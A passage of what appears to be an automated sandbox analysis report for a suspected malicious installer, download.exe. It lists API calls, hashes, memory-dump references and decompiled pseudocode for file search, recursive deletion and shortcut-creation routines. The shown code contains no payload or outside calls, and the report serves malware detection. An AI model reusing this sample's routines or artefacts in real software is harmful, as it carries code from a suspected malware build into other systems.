                                                      • GlobalFree.KERNEL32(?), ref: 706B1CEC
                                                      • GlobalFree.KERNEL32(?), ref: 706B1CF1
                                                      • GlobalFree.KERNEL32(00000000), ref: 706B1ED8
                                                      • lstrcpyA.KERNEL32(?,?), ref: 706B2061
                                                      • GetModuleHandleA.KERNEL32(00000008), ref: 706B20D4
                                                      • LoadLibraryA.KERNEL32(00000008), ref: 706B20E5
                                                      • GetProcAddress.KERNEL32(?,?), ref: 706B213E
                                                      • lstrlenA.KERNEL32(00000408), ref: 706B2158
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1880663434.00000000706B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 706B0000, based on PE: true
                                                      • Associated: 00000002.00000002.1880594487.00000000706B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.1880732550.00000000706B3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.1880781272.00000000706B5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_706b0000_download.jbxd
                                                      Similarity
                                                      • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                      • String ID:
                                                      • API String ID: 245916457-0
                                                      • Opcode ID: 4587304b6723f461e924fbc732b1406ddbda198438ef154cdf76fa4ef8df6b7b
                                                      • Instruction ID: c3e5910cb04186ce6f0cd71554026c62044f5b2b7ab08f7ccf57d3e126a83eb1
                                                      • Opcode Fuzzy Hash: 4587304b6723f461e924fbc732b1406ddbda198438ef154cdf76fa4ef8df6b7b
                                                      • Instruction Fuzzy Hash: 8F228EF190424AAEDB119FA4C8A47EEBBFABF05314FB0452ED156AA2C0D77C5A41CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405745 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 159filestringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 705 405745-40576b call 405a03 708 405784-40578b 705->708 709 40576d-40577f DeleteFileA 705->709 711 40578d-40578f 708->711 712 40579e-4057ae call 405f7d 708->712 710 40590e-405912 709->710 713 405795-405798 711->713 714 4058bc-4058c1 711->714 718 4057b0-4057bb lstrcatA 712->718 719 4057bd-4057be call 40595c 712->719 713->712 713->714 714->710 717 4058c3-4058c6 714->717 720 4058d0-4058d8 call 406280 717->720 721 4058c8-4058ce 717->721 722 4057c3-4057c6 718->722 719->722 720->710 728 4058da-4058ee call 405915 call 4056fd 720->728 721->710 726 4057d1-4057d7 lstrcatA 722->726 727 4057c8-4057cf 722->727 729 4057dc-4057fa lstrlenA FindFirstFileA 726->729 727->726 727->729 743 4058f0-4058f3 728->743 744 405906-405909 call 4050a4 728->744 731 405800-405817 call 405940 729->731 732 4058b2-4058b6 729->732 739 405822-405825 731->739 740 405819-40581d 731->740 732->714 734 4058b8 732->734 734->714 741 405827-40582c 739->741 742 405838-405846 call 405f7d 739->742 740->739 745 40581f 740->745 746 405891-4058a3 FindNextFileA 741->746 747 40582e-405830 741->747 755 405848-405850 742->755 756 40585d-405868 call 4056fd 742->756 743->721 749 4058f5-405904 call 4050a4 call 405d5c 743->749 744->710 745->739 746->731 753 4058a9-4058ac FindClose 746->753 747->742 751 405832-405836 747->751 749->710 751->742 751->746 753->732 755->746 758 405852-40585b call 405745 755->758 765 405889-40588c call 4050a4 756->765 766 40586a-40586d 756->766 758->746 765->746 768 405881-405887 766->768 769 40586f-40587f call 4050a4 call 405d5c 766->769 768->746 769->746
                                                      C-Code - Quality: 98%
                                                      			E00405745(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405A03(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x7a2fe8 =  *0x7a2fe8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00405F7D(0x7a0548, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E0040595C(_t73);
					} else {
						lstrcatA(0x7a0548, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]); // executed
						_t40 = FindFirstFileA(0x7a0548,  &_v336); // executed
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405940( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E00405F7D(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E004056FD(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E004050A4(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x7a2fe8 =  *0x7a2fe8 + 1;
										} else {
											E004050A4(0xfffffff1, _t73);
											E00405D5C(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405745(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x7a0548 - 0x5c;
					if( *0x7a0548 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E00406280(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405915(_t73);
							_t40 = E004056FD(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E004050A4(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E004050A4(0xfffffff1, _t73);
							return E00405D5C(_t72, _t73, 0);
						}
						L33:
						 *0x7a2fe8 =  *0x7a2fe8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}



















                                                      0x0040574f
                                                      0x00405754
                                                      0x0040575d
                                                      0x00405760
                                                      0x00405768
                                                      0x0040576b
                                                      0x0040576e
                                                      0x00405776
                                                      0x00405778
                                                      0x00405779
                                                      0x00000000
                                                      0x00405779
                                                      0x00405784
                                                      0x00405787
                                                      0x00405787
                                                      0x00405787
                                                      0x0040578b
                                                      0x0040579e
                                                      0x004057a5
                                                      0x004057aa
                                                      0x004057ae
                                                      0x004057be
                                                      0x004057b0
                                                      0x004057b6
                                                      0x004057b6
                                                      0x004057c3
                                                      0x004057c6
                                                      0x004057d1
                                                      0x004057d7
                                                      0x004057dc
                                                      0x004057ec
                                                      0x004057ee
                                                      0x004057f4
                                                      0x004057f7
                                                      0x004057fa
                                                      0x004058b2
                                                      0x004058b2
                                                      0x004058b6
                                                      0x004058b8
                                                      0x004058b8
                                                      0x004058b8
                                                      0x004058b8
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00405800
                                                      0x00405800
                                                      0x00405809
                                                      0x0040580f
                                                      0x00405814
                                                      0x00405817
                                                      0x00405819
                                                      0x0040581d
                                                      0x0040581f
                                                      0x0040581f
                                                      0x0040581d
                                                      0x00405822
                                                      0x00405825
                                                      0x00405838
                                                      0x0040583a
                                                      0x0040583f
                                                      0x00405846
                                                      0x00405861
                                                      0x00405866
                                                      0x00405868
                                                      0x0040588c
                                                      0x0040586a
                                                      0x0040586a
                                                      0x0040586d
                                                      0x00405881
                                                      0x0040586f
                                                      0x00405872
                                                      0x0040587a
                                                      0x0040587a
                                                      0x0040586d
                                                      0x00405848
                                                      0x0040584e
                                                      0x00405850
                                                      0x00405856
                                                      0x00405856
                                                      0x00405850
                                                      0x00000000
                                                      0x00405846
                                                      0x00405827
                                                      0x0040582a
                                                      0x0040582c
                                                      0x00000000
                                                      0x00000000
                                                      0x0040582e
                                                      0x00405830
                                                      0x00000000
                                                      0x00000000
                                                      0x00405832
                                                      0x00405836
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00405891
                                                      0x0040589b
                                                      0x004058a1
                                                      0x004058a1
                                                      0x004058ac
                                                      0x00000000
                                                      0x004058ac
                                                      0x004057c8
                                                      0x004057cf
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040578d
                                                      0x0040578d
                                                      0x0040578f
                                                      0x004058bc
                                                      0x004058be
                                                      0x004058c1
                                                      0x00405912
                                                      0x00405912
                                                      0x00405912
                                                      0x004058c3
                                                      0x004058c6
                                                      0x004058d1
                                                      0x004058d6
                                                      0x004058d8
                                                      0x00000000
                                                      0x00000000
                                                      0x004058db
                                                      0x004058e7
                                                      0x004058ec
                                                      0x004058ee
                                                      0x00000000
                                                      0x00405909
                                                      0x004058f0
                                                      0x004058f3
                                                      0x00000000
                                                      0x00000000
                                                      0x004058f8
                                                      0x00000000
                                                      0x004058ff
                                                      0x004058c8
                                                      0x004058c8
                                                      0x00000000
                                                      0x004058c8
                                                      0x00405795
                                                      0x00405798
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00405798

                                                      APIs
                                                      • DeleteFileA.KERNELBASE(?,?,75A63410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040576E
                                                      • lstrcatA.KERNEL32(Forgngeliges.rea,\*.*,Forgngeliges.rea,?,?,75A63410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057B6
                                                      • lstrcatA.KERNEL32(?,0040A014,?,Forgngeliges.rea,?,?,75A63410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057D7
                                                      • lstrlenA.KERNEL32(?,?,0040A014,?,Forgngeliges.rea,?,?,75A63410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057DD
                                                      • FindFirstFileA.KERNELBASE(Forgngeliges.rea,?,?,?,0040A014,?,Forgngeliges.rea,?,?,75A63410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057EE
                                                      • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 0040589B
                                                      • FindClose.KERNEL32(00000000), ref: 004058AC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                      • String ID: "C:\Users\user\Desktop\download.exe"$C:\Users\user\AppData\Local\Temp\$Forgngeliges.rea$\*.*
                                                      • API String ID: 2035342205-3789463636
                                                      • Opcode ID: 7ffff7cd34069f0b96449660ed6e7fefb86e4840da2f9e0b27970072ed7274d0
                                                      • Instruction ID: 8fe5727fece67214ca9e537269006626f4bb6c92c430407bbf8d6e8d58a7b1f2
                                                      • Opcode Fuzzy Hash: 7ffff7cd34069f0b96449660ed6e7fefb86e4840da2f9e0b27970072ed7274d0
                                                      • Instruction Fuzzy Hash: 6A51C131800A09AADF217B218C85BBF7A78DF42714F14817FF855B51D2D73C8952DE69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004020D1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 74%
                                                      			E004020D1() {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x3c) = E00402ACB(0xfffffff0);
				 *(_t111 - 0xc) = E00402ACB(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x80)) = E00402ACB(2);
				 *((intOrPtr*)(_t111 - 0x7c)) = E00402ACB(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402ACB(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x88) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x78) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E00405982( *(_t111 - 0xc)) == 0) {
					E00402ACB(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408410, _t87, 1, 0x408400, _t59); // executed
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408420, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Heize");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x78));
						_t95 =  *((intOrPtr*)(_t111 - 0x7c));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x88));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x80)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x34)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x3c), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}






















                                                      0x004020da
                                                      0x004020e4
                                                      0x004020ee
                                                      0x004020f8
                                                      0x00402103
                                                      0x00402106
                                                      0x00402120
                                                      0x00402126
                                                      0x0040212c
                                                      0x0040212f
                                                      0x00402139
                                                      0x0040213d
                                                      0x0040213d
                                                      0x00402142
                                                      0x00402153
                                                      0x0040215b
                                                      0x00402234
                                                      0x00402234
                                                      0x0040223b
                                                      0x00402161
                                                      0x00402161
                                                      0x00402170
                                                      0x00402174
                                                      0x00402177
                                                      0x0040217d
                                                      0x0040218b
                                                      0x0040218e
                                                      0x00402190
                                                      0x0040219b
                                                      0x0040219b
                                                      0x004021a0
                                                      0x004021a2
                                                      0x004021a9
                                                      0x004021a9
                                                      0x004021ac
                                                      0x004021b5
                                                      0x004021b8
                                                      0x004021bd
                                                      0x004021bf
                                                      0x004021cc
                                                      0x004021cc
                                                      0x004021cf
                                                      0x004021d8
                                                      0x004021db
                                                      0x004021e4
                                                      0x004021ea
                                                      0x004021f1
                                                      0x0040220a
                                                      0x0040220c
                                                      0x0040221a
                                                      0x0040221a
                                                      0x0040220a
                                                      0x0040221d
                                                      0x00402223
                                                      0x00402223
                                                      0x00402226
                                                      0x0040222c
                                                      0x00402232
                                                      0x00402247
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00402232
                                                      0x0040223d
                                                      0x0040295a
                                                      0x00402966

                                                      APIs
                                                      • CoCreateInstance.OLE32(00408410,?,00000001,00408400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402153
                                                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402202
                                                      Strings
                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize, xrefs: 00402193
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: ByteCharCreateInstanceMultiWide
                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize
                                                      • API String ID: 123533781-2284297545
                                                      • Opcode ID: 1b6ba08932179521d31179491063ac25ac72046f538eaf8da177d2cba04aa769
                                                      • Instruction ID: 9e9d5d88055110978c4ae6826d2e5e59fb59f3b6f63c31ddbaa09ad4cf03e3db
                                                      • Opcode Fuzzy Hash: 1b6ba08932179521d31179491063ac25ac72046f538eaf8da177d2cba04aa769
                                                      • Instruction Fuzzy Hash: F4511871A00208BFCF10DFE4C989A9D7BB5BF48318F2085AAF515EB2D1DA799941CF14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00406280(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x7a0d90); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x7a0d90;
			}




                                                      0x0040628b
                                                      0x00406294
                                                      0x00000000
                                                      0x004062a1
                                                      0x00406297
                                                      0x00000000

                                                      APIs
                                                      • FindFirstFileA.KERNELBASE(75A63410,007A0D90,Forgngeliges.rea,00405A46,Forgngeliges.rea,Forgngeliges.rea,00000000,Forgngeliges.rea,Forgngeliges.rea,75A63410,?,C:\Users\user\AppData\Local\Temp\,00405765,?,75A63410,C:\Users\user\AppData\Local\Temp\), ref: 0040628B
                                                      • FindClose.KERNEL32(00000000), ref: 00406297
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID: Forgngeliges.rea
                                                      • API String ID: 2295610775-2553225184
                                                      • Opcode ID: c24f07e19fd736ab640c4fa4be5052e5aaef0f0ac654c0d60e62e1f7b242b1f9
                                                      • Instruction ID: 649fadc54739959b3e8e38c8a8f4dd54304d89d7bf2914afa8982a1acff588dd
                                                      • Opcode Fuzzy Hash: c24f07e19fd736ab640c4fa4be5052e5aaef0f0ac654c0d60e62e1f7b242b1f9
                                                      • Instruction Fuzzy Hash: E0D012729051205FCA006778AE0C84B7A589F46370B114B7AB4AAF15E0CA788C7286D8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004026FE Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 41%
                                                      			E004026FE(char __ebx, char* __edi, char* __esi) {
				void* _t6;
				void* _t19;

				_t6 = FindFirstFileA(E00402ACB(2), _t19 - 0x1c8); // executed
				if(_t6 != 0xffffffff) {
					E00405EDB(__edi, _t6);
					_push(_t19 - 0x19c);
					_push(__esi);
					E00405F7D();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}





                                                      0x0040270d
                                                      0x00402716
                                                      0x0040272a
                                                      0x00402735
                                                      0x00402736
                                                      0x00402875
                                                      0x00402718
                                                      0x00402718
                                                      0x0040271a
                                                      0x0040271c
                                                      0x0040271c
                                                      0x0040295a
                                                      0x00402966

                                                      APIs
                                                      • FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 0040270D
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: FileFindFirst
                                                      • String ID:
                                                      • API String ID: 1974802433-0
                                                      • Opcode ID: bb1fd79773653f64b355e8a14e31788b575d62927d75190881792420c8ccdb6e
                                                      • Instruction ID: d02168588d0434b50479f8c5d7bfa648a046adbf5aa12c789179644532e0cc19
                                                      • Opcode Fuzzy Hash: bb1fd79773653f64b355e8a14e31788b575d62927d75190881792420c8ccdb6e
                                                      • Instruction Fuzzy Hash: 19F0A072604111EBD701E7A49949DEEB7688F15328FA0457BE281F20C1D6B88A459B3A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004037AB Relevance: 49.2, APIs: 14, Strings: 14, Instructions: 215stringregistryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
